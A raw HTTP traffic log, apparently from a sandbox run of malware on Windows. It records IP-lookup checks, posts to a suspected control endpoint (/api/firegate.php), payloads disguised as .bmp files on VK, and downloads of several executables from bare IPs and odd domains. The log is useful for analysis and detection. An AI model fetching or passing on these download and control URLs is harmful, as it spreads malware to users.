Network Analysis

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: api.myip.com

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:41 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive vary: Accept-Encoding CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=gm1KpqzzSq7bl04g7dP5C1U7rqpMSOeOZxGhMiNHbf4HSYCA%2Bn37%2Bprhc7W03WUq5oAFArcXODF5zMxdVmgarth7PeSZLU46fnFjulOlgmg4pP6BME7PLirFBjf%2BcA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e24343c4e3219dd-KIX

GET /doc746114504_647280747?hash=cvDFKP5q0CQEjBCbeoeHvPNrWE0xbMxZEmrkIeNKcET&dl=G42DMMJRGQ2TANA:1661413520:uZNj68vRUvQaydRD8wpAK8zluN0I7otw5AHbA1ZlN9T&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:46 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234766 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixlang=17; expires=Sat, 29 Jun 2024 06:30:41 GMT; path=/; domain=.vk.com Set-Cookie: remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; expires=Fri, 05 Jul 2024 01:51:46 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Set-Cookie: remixlgck=6578b88a33cb8728c5; expires=Mon, 08 Jul 2024 06:00:44 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH; expires=Sun, 07 Jul 2024 16:48:51 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /setup294.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: camoverde.pw Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:49 GMT Content-Type: application/x-msdos-program Content-Length: 1577312 Connection: keep-alive Last-Modified: Thu, 06 Jul 2023 00:19:40 GMT ETag: "181160-5ffc678de5f00" Cache-Control: max-age=14400 CF-Cache-Status: HIT Age: 3025 Accept-Ranges: bytes Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=zWJxjn9Q%2F78mzNmmq67M14Z5BV%2F48b7Xu9bXTSmYEXKYeHNgETmXphb6YLtx%2Fo7v9A3XShnk7xmpgR91BwuzZ1lzGNTn5kQ2W2ysU%2BMJx4JqzpKRQNuyJhqWJkAu37I%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e2434706e9f8391-KIX alt-svc: h3=":443"; ma=86400

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:53 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234781 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663648937?hash=eKai4FYeayZCAEjqzlxZ2gWz79KxiwUMuktQ4fZ6rr0&dl=8PltKcE2IQ6oZHvv1IHsdh8qZWM237x2z5umRu20Q5L&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH

HTTP/1.1 302 Found Server: kittenx Date: Thu, 06 Jul 2023 01:51:57 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909618/u808950829/docs/d11/868beb0af33d/3kqwpj3h.bmp?extra=JyCyDG6PFHazUQR0xfP2b1kHp8syIWsC-VEvsQPMUXF14_5CBCtyBObjKu16HaFrJpcXz6RdM4NUQUA7AT7sFQPaNk-kP6fjCJHI-6ei6gbMpdGkitmEut9L_e3922pXGgK44PdThWMcmjfhJg X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663788437?hash=2eEvnU5tvv0tTTXDhEX8q9Boubn9undHCOt73KTUqzD&dl=EJ05zUitXuxdQoIcYUJ5Zj5KPM6Kzzrdpz0VhUeNkOo&api=1&no_preview=1#WW1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH

HTTP/1.1 302 Found Server: kittenx Date: Thu, 06 Jul 2023 01:51:58 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 0 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixir=1; path=/; domain=.vk.com; secure; HttpOnly Cache-control: no-store X-Robots-Tag: noindex,nofollow Location: https://sun6-21.userapi.com/c909618/u808950829/docs/d15/55b2d56c0cdb/WWW1.bmp?extra=LNvJInvcwbEIMsFVEEAn-sruvZLSPLsZ0csa6zoRoJnFOzu5bL_VsP_UlvV0osoFJLByZOzMVdl5mGWRHSDUkmAfxnPZJCC2Na2s-5d633NzeLL8eitoPbDh5O2gUxZAiv2_WD6GGb9_ekgfaA X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u808950829/docs/d11/868beb0af33d/3kqwpj3h.bmp?extra=JyCyDG6PFHazUQR0xfP2b1kHp8syIWsC-VEvsQPMUXF14_5CBCtyBObjKu16HaFrJpcXz6RdM4NUQUA7AT7sFQPaNk-kP6fjCJHI-6ei6gbMpdGkitmEut9L_e3922pXGgK44PdThWMcmjfhJg HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:58 GMT Content-Type: image/x-ms-bmp Content-Length: 1369092 Connection: keep-alive Last-Modified: Sat, 01 Jul 2023 10:57:51 GMT ETag: "64a006af-14e404" Expires: Sat, 05 Aug 2023 01:51:58 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc808950829_663371568?hash=nCbeQhSdektZCklmCq7XtG48Ee60nv8DORi9fErSJWH&dl=TYjpYtrURbaoeiox6ukI3zcdJlSPMzTTZwoXzpHEm48&api=1&no_preview=1#rise_test HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234723 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /c909618/u808950829/docs/d15/55b2d56c0cdb/WWW1.bmp?extra=LNvJInvcwbEIMsFVEEAn-sruvZLSPLsZ0csa6zoRoJnFOzu5bL_VsP_UlvV0osoFJLByZOzMVdl5mGWRHSDUkmAfxnPZJCC2Na2s-5d633NzeLL8eitoPbDh5O2gUxZAiv2_WD6GGb9_ekgfaA HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: sun6-21.userapi.com Cache-Control: no-cache Connection: Keep-Alive

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:59 GMT Content-Type: image/x-ms-bmp Content-Length: 4861444 Connection: keep-alive Last-Modified: Tue, 04 Jul 2023 11:34:48 GMT ETag: "64a403d8-4a2e04" Expires: Sat, 05 Aug 2023 01:51:59 GMT Cache-Control: max-age=2592000 X-Frontend: front6-21 Access-Control-Expose-Headers: X-Frontend Access-Control-Allow-Origin: * Access-Control-Allow-Methods: GET, HEAD, OPTIONS Strict-Transport-Security: max-age=15768000 Access-Control-Allow-Headers: X-Quic Timing-Allow-Origin: * Accept-Ranges: bytes

GET /doc791620691_663065029?hash=Efubo9FQtw3Bdj42XJVcJwymfIH3PazMKz8g5wJ0dZX&dl=G44TCNRSGA3DSMI:1682787066:QgrgzF33wDt9bwmmOgWCYTv61J7HwhLVZOXGaEdWiKP&api=1&no_preview=1#stats HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:51:59 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234782 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline';report-uri /csp X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET /doc808950829_663496587?hash=9HBIzrbBWHKqUnGhHt30dMcZIm1RpmRRZBzZ89JCfGw&dl=JRIT3v6zzNFrou8UYI02dSfdibpUzCLo9YvFXREFvCT&api=1&no_preview=1 HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: vk.com Cache-Control: no-cache Cookie: remixlang=17; remixstlid=9119049977600142622_htRwKiQNmu9h9kGvyZIIBDtJQaLHg4BdSxtHegjP8gT; remixlgck=6578b88a33cb8728c5; remixstid=885618440_mC7moJgb9CryuIaLsDSTuodaP9wNS4si93fs8yxJBMH; remixir=1

HTTP/1.1 200 OK Server: kittenx Date: Thu, 06 Jul 2023 01:52:01 GMT Content-Type: text/html; charset=windows-1251 Content-Length: 234698 Connection: keep-alive X-Powered-By: KPHP/7.4.114090 Set-Cookie: remixir=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure; HttpOnly Set-Cookie: remixstemp=DELETED; expires=Thu, 01 Jan 1970 00:00:01 GMT; path=/; domain=.vk.com; secure Cache-control: no-store X-Robots-Tag: noindex,nofollow Content-Security-Policy: default-src * data: blob: about: vkcalls:;script-src 'self' https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://*.mail.ru https://r.mradx.net https://s.ytimg.com https://platform.twitter.com https://cdn.syndication.twimg.com https://www.instagram.com https://connect.facebook.net https://telegram.org https://*.yandex.ru https://*.google-analytics.com https://*.youtube.com https://maps.googleapis.com https://translate.googleapis.com https://*.google.com https://google.com https://*.vkpartner.ru https://*.moatads.com https://*.adlooxtracking.ru https://*.serving-sys.ru https://*.weborama-tech.ru https://*.gstatic.com https://*.google.ru https://securepubads.g.doubleclick.net https://cdn.ampproject.org https://www.googletagmanager.com https://googletagmanager.com https://*.vk-cdn.net https://*.hit.gemius.pl https://yastatic.net https://analytics.tiktok.com 'unsafe-inline' 'unsafe-eval' blob:;style-src https://vk.com https://*.vk.com https://vk.ru https://*.vk.ru https://static.vk.me https://r.mradx.net https://ton.twimg.com https://tagmanager.google.com https://platform.twitter.com https://*.googleapis.com 'self' 'unsafe-inline' X-XSS-Protection: 1; report=/xss_reports X-Frame-Options: deny X-Frontend: front605106 Strict-Transport-Security: max-age=15768000 Access-Control-Expose-Headers: X-Frontend

GET / HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: db-ip.com

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:52:37 GMT Content-Type: text/html; charset=UTF-8 Transfer-Encoding: chunked Connection: keep-alive Cache-control: max-age=28800 X-IPLB-Request-ID: 8D655679:CE00_93878F2E:0050_64A61E65_1B7B6EE4:2467B X-IPLB-Instance: 30783 CF-Cache-Status: EXPIRED Last-Modified: Wed, 05 Jul 2023 21:50:24 GMT Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=6rcZb5k8k6YQQoO31Rf3wU%2Bt9hcrBilOH25GlAF2A6e8So%2BCaveZvbBHXhpUMII2oe6xdxfdN7fBryLM4cAuxYohNIOJtWsaRsnNOd2KyTo8SK1joUxS3fnNnA%3D%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e24359a7b2919e6-KIX alt-svc: h3=":443"; ma=86400

POST /v2/p31e4d59ee6ad1a0b5cc80695a873e43a8fbca06/self HTTP/1.1 Connection: Keep-Alive Referer: https://db-ip.com/ User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 0 Host: api.db-ip.com

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:52:38 GMT Content-Type: application/json Transfer-Encoding: chunked Connection: keep-alive Access-Control-Allow-Origin: http*://*db-ip.com Cache-control: max-age=180 X-IPLB-Request-ID: AC46E99D:3D6E_93878F2E:0050_64A61E66_1B80B097:2467C X-IPLB-Instance: 30783 CF-Cache-Status: DYNAMIC Report-To: {"endpoints":[{"url":"https:\/\/a.nel.cloudflare.com\/report\/v3?s=l4Re7K%2F5%2Fj0zCalSWofJ89WRnEWvVPWKKmOuOFzVTtgYs6hI0pDXRaY5vWh6T9oUs59yFMz8AfzpBfldbsRkDOJQ57xT006goE0E78CWGGTEXA%2BgZoEiU0STIgdoNcg%3D"}],"group":"cf-nel","max_age":604800} NEL: {"success_fraction":0,"report_to":"cf-nel","max_age":604800} Server: cloudflare CF-RAY: 7e24359dcebc8d0c-KIX alt-svc: h3=":443"; ma=86400

GET /api/tracemap.php HTTP/1.1 Connection: Keep-Alive User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:41 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 15 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:42 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 108 Keep-Alive: timeout=5, max=99 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

POST /api/firegate.php HTTP/1.1 Connection: Keep-Alive Content-Type: application/x-www-form-urlencoded User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Content-Length: 133 Host: 208.67.104.60

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:48 GMT Server: Apache/2.4.53 (Win64) OpenSSL/1.1.1n PHP/7.4.29 X-Powered-By: PHP/7.4.29 Content-Length: 3692 Keep-Alive: timeout=5, max=100 Connection: Keep-Alive Content-Type: text/html; charset=UTF-8

HEAD /gallery/photo270.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.31 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Length: 6025032 Content-Type: application/octet-stream Last-Modified: Thu, 06 Jul 2023 09:48:08 GMT Accept-Ranges: bytes ETag: "b1621f8eeafd91:0" Server: Microsoft-IIS/10.0 Date: Thu, 06 Jul 2023 09:51:48 GMT

HEAD /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "52e00-64a61c9e-60e81;;;" last-modified: Thu, 06 Jul 2023 01:45:02 GMT content-type: application/x-executable content-length: 339456 accept-ranges: bytes date: Thu, 06 Jul 2023 01:51:49 GMT server: LiteSpeed connection: Keep-Alive

GET /roots/dstrootcax3.p7c HTTP/1.1 Connection: Keep-Alive Accept: */* User-Agent: Microsoft-CryptoAPI/6.1 Host: apps.identrust.com

HTTP/1.1 200 OK X-XSS-Protection: 1; mode=block Strict-Transport-Security: max-age=15768000 X-Frame-Options: SAMEORIGIN X-Content-Type-Options: nosniff Content-Security-Policy: default-src 'self' *.identrust.com Last-Modified: Wed, 08 Feb 2023 16:52:56 GMT ETag: "37d-5f433188daa00" Accept-Ranges: bytes Content-Length: 893 X-Content-Type-Options: nosniff X-Frame-Options: sameorigin Content-Type: application/pkcs7-mime Cache-Control: max-age=3600 Expires: Thu, 06 Jul 2023 02:51:49 GMT Date: Thu, 06 Jul 2023 01:51:49 GMT Connection: keep-alive

GET /g.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 45.66.230.164 Cache-Control: no-cache

HTTP/1.1 200 OK etag: "52e00-64a61c9e-60e81;;;" last-modified: Thu, 06 Jul 2023 01:45:02 GMT content-type: application/x-executable content-length: 339456 accept-ranges: bytes date: Thu, 06 Jul 2023 01:51:50 GMT server: LiteSpeed connection: Keep-Alive

GET /gallery/photo270.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 77.91.124.31 Cache-Control: no-cache

HTTP/1.1 200 OK Content-Type: application/octet-stream Last-Modified: Thu, 06 Jul 2023 09:48:08 GMT Accept-Ranges: bytes ETag: "b1621f8eeafd91:0" Server: Microsoft-IIS/10.0 Date: Thu, 06 Jul 2023 09:51:48 GMT Content-Length: 6025032

HEAD /dl/6523.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: hugersi.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.22.1 Date: Thu, 06 Jul 2023 01:51:50 GMT Content-Type: application/octet-stream Content-Length: 221696 Last-Modified: Thu, 06 Jul 2023 01:30:02 GMT Connection: keep-alive ETag: "64a6191a-36200" Accept-Ranges: bytes

HEAD /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Content-Length: 0 Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 06 Jul 2023 01:51:50 GMT Content-Type: application/octet-stream Content-Length: 430080 Last-Modified: Wed, 05 Jul 2023 09:58:01 GMT Connection: keep-alive ETag: "64a53ea9-69000" Accept-Ranges: bytes

GET /m/okka25.exe HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: zzz.fhauiehgha.com Cache-Control: no-cache

HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Thu, 06 Jul 2023 01:51:50 GMT Content-Type: application/octet-stream Content-Length: 430080 Last-Modified: Wed, 05 Jul 2023 09:58:01 GMT Connection: keep-alive ETag: "64a53ea9-69000" Accept-Ranges: bytes

GET /4.php HTTP/1.1 User-Agent: Mozilla/5.0 (Windows NT 10.0; Win64; x64) AppleWebKit/537.36 (KHTML, like Gecko) Chrome/74.0.3729.169 Safari/537.36 Host: 176.113.115.84:8080 Cache-Control: no-cache

HTTP/1.1 200 OK Date: Thu, 06 Jul 2023 01:51:51 GMT Server: Apache/2.4.6 (CentOS) PHP/5.4.16 X-Powered-By: PHP/5.4.16 Content-Transfer-Encoding: Binary Content-disposition: attachment; filename="w1ux8ig01diq.exe" Transfer-Encoding: chunked Content-Type: application/octet-stream

